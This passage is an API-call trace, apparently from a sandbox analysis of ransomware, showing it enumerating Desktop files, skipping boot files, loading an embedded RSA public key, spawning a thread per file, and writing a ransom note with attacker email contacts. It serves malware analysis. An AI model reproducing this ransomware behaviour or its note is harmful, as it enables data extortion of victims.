lpSrch="NTDETECT.COM") returned 0x0 [0168.704] StrStrW (lpFirst="BOrtQ-gODoJ96Mp2i.pps", lpSrch="ntdetect.com") returned 0x0 [0168.704] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned 62 [0168.704] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") [0168.704] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0168.704] lstrcpyW (in: lpString1=0x17be7c, lpString2="BOrtQ-gODoJ96Mp2i.pps" | out: lpString1="BOrtQ-gODoJ96Mp2i.pps") returned="BOrtQ-gODoJ96Mp2i.pps" [0168.704] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0168.704] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9b0 [0168.705] Sleep (dwMilliseconds=0x96) [0168.860] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0168.860] lstrcmpW (lpString1="RH-9w1ekDlX.swf", lpString2="..") returned 1 [0168.860] lstrcmpW (lpString1="RH-9w1ekDlX.swf", lpString2=".") returned 1 [0168.860] StrStrW (lpFirst="RH-9w1ekDlX.swf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0168.860] StrStrW (lpFirst="RH-9w1ekDlX.swf", lpSrch="ntldr") returned 0x0 [0168.860] StrStrW (lpFirst="RH-9w1ekDlX.swf", lpSrch="NTLDR") returned 0x0 [0168.860] StrStrW (lpFirst="RH-9w1ekDlX.swf", lpSrch="NTDETECT.COM") returned 0x0 [0168.860] StrStrW (lpFirst="RH-9w1ekDlX.swf", lpSrch="ntdetect.com") returned 0x0 [0168.860] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned 62 [0168.860] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") [0168.860] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0168.860] lstrcpyW (in: lpString1=0x17be7c, lpString2="RH-9w1ekDlX.swf" | out: lpString1="RH-9w1ekDlX.swf") returned="RH-9w1ekDlX.swf" [0168.860] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0168.860] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9ac [0168.860] Sleep (dwMilliseconds=0x96) [0169.016] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0169.016] lstrcmpW (lpString1="rvzAqm2.flv", lpString2="..") returned 1 [0169.016] lstrcmpW (lpString1="rvzAqm2.flv", lpString2=".") returned 1 [0169.016] StrStrW (lpFirst="rvzAqm2.flv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0169.016] StrStrW (lpFirst="rvzAqm2.flv", lpSrch="ntldr") returned 0x0 [0169.016] StrStrW (lpFirst="rvzAqm2.flv", lpSrch="NTLDR") returned 0x0 [0169.016] StrStrW (lpFirst="rvzAqm2.flv", lpSrch="NTDETECT.COM") returned 0x0 [0169.016] StrStrW (lpFirst="rvzAqm2.flv", lpSrch="ntdetect.com") returned 0x0 [0169.016] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned 62 [0169.016] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") [0169.016] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0169.016] lstrcpyW (in: lpString1=0x17be7c, lpString2="rvzAqm2.flv" | out: lpString1="rvzAqm2.flv") returned="rvzAqm2.flv" [0169.016] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0169.016] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9b4 [0169.017] Sleep (dwMilliseconds=0x96) [0169.172] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0169.172] lstrcmpW (lpString1="TrEKohawJ.m4a", lpString2="..") returned 1 [0169.172] lstrcmpW (lpString1="TrEKohawJ.m4a", lpString2=".") returned 1 [0169.172] StrStrW (lpFirst="TrEKohawJ.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0169.172] StrStrW (lpFirst="TrEKohawJ.m4a", lpSrch="ntldr") returned 0x0 [0169.172] StrStrW (lpFirst="TrEKohawJ.m4a", lpSrch="NTLDR") returned 0x0 [0169.172] StrStrW (lpFirst="TrEKohawJ.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0169.172] StrStrW (lpFirst="TrEKohawJ.m4a", lpSrch="ntdetect.com") returned 0x0 [0169.172] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned 62 [0169.172] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") [0169.172] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0169.172] lstrcpyW (in: lpString1=0x17be7c, lpString2="TrEKohawJ.m4a" | out: lpString1="TrEKohawJ.m4a") returned="TrEKohawJ.m4a" [0169.172] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0169.175] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9b8 [0169.175] Sleep (dwMilliseconds=0x96) [0169.328] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0169.328] lstrcmpW (lpString1="TxQmAhXtJ1.mp3", lpString2="..") returned 1 [0169.328] lstrcmpW (lpString1="TxQmAhXtJ1.mp3", lpString2=".") returned 1 [0169.328] StrStrW (lpFirst="TxQmAhXtJ1.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0169.328] StrStrW (lpFirst="TxQmAhXtJ1.mp3", lpSrch="ntldr") returned 0x0 [0169.328] StrStrW (lpFirst="TxQmAhXtJ1.mp3", lpSrch="NTLDR") returned 0x0 [0169.328] StrStrW (lpFirst="TxQmAhXtJ1.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0169.328] StrStrW (lpFirst="TxQmAhXtJ1.mp3", lpSrch="ntdetect.com") returned 0x0 [0169.328] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned 62 [0169.328] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") [0169.328] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0169.328] lstrcpyW (in: lpString1=0x17be7c, lpString2="TxQmAhXtJ1.mp3" | out: lpString1="TxQmAhXtJ1.mp3") returned="TxQmAhXtJ1.mp3" [0169.328] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0169.328] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9bc [0169.328] Sleep (dwMilliseconds=0x96) [0169.484] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0169.484] lstrcmpW (lpString1="ySq45fyDTuTLWzePdp4.m4a", lpString2="..") returned 1 [0169.484] lstrcmpW (lpString1="ySq45fyDTuTLWzePdp4.m4a", lpString2=".") returned 1 [0169.484] StrStrW (lpFirst="ySq45fyDTuTLWzePdp4.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0169.484] StrStrW (lpFirst="ySq45fyDTuTLWzePdp4.m4a", lpSrch="ntldr") returned 0x0 [0169.484] StrStrW (lpFirst="ySq45fyDTuTLWzePdp4.m4a", lpSrch="NTLDR") returned 0x0 [0169.484] StrStrW (lpFirst="ySq45fyDTuTLWzePdp4.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0169.484] StrStrW (lpFirst="ySq45fyDTuTLWzePdp4.m4a", lpSrch="ntdetect.com") returned 0x0 [0169.484] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned 62 [0169.484] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") [0169.484] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0169.484] lstrcpyW (in: lpString1=0x17be7c, lpString2="ySq45fyDTuTLWzePdp4.m4a" | out: lpString1="ySq45fyDTuTLWzePdp4.m4a") returned="ySq45fyDTuTLWzePdp4.m4a" [0169.484] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0169.484] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9c0 [0169.484] Sleep (dwMilliseconds=0x96) [0169.640] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0169.640] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0169.640] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0169.640] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM" [0169.640] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*" [0169.640] SetErrorMode (uMode=0x1) returned 0x1 [0169.640] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\_HELP_INSTRUCTION.TXT") returned 79 [0169.640] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0169.641] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0169.641] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x9c4) returned 0x0 [0169.641] RegQueryValueExW (in: hKey=0x9c4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x46a1d0, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x46a1d0*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0169.641] RegCloseKey (hKey=0x9c4) returned 0x0 [0169.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0169.641] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0169.641] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.641] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c4 [0169.642] WriteFile (in: hFile=0x9c4, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0169.642] CloseHandle (hObject=0x9c4) returned 1 [0169.642] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0169.642] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM") returned="Ee7G-xHgdwJfqcsImMM" [0169.642] lstrcpyW (in: lpString1=0x17b644, lpString2="Ee7G-xHgdwJfqcsImMM" | out: lpString1="Ee7G-xHgdwJfqcsImMM") returned="Ee7G-xHgdwJfqcsImMM" [0169.642] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0169.642] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0169.642] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0169.642] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0169.643] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0169.643] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0169.643] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0169.643] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0169.643] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0169.643] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0169.643] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0169.643] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0169.643] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0169.643] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0169.643] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0169.643] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0169.643] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0169.643] lstrcmpW (lpString1="KZ7l4KmpPgbeETV_wvF", lpString2="..") returned 1 [0169.643] lstrcmpW (lpString1="KZ7l4KmpPgbeETV_wvF", lpString2=".") returned 1 [0169.643] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0169.643] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS 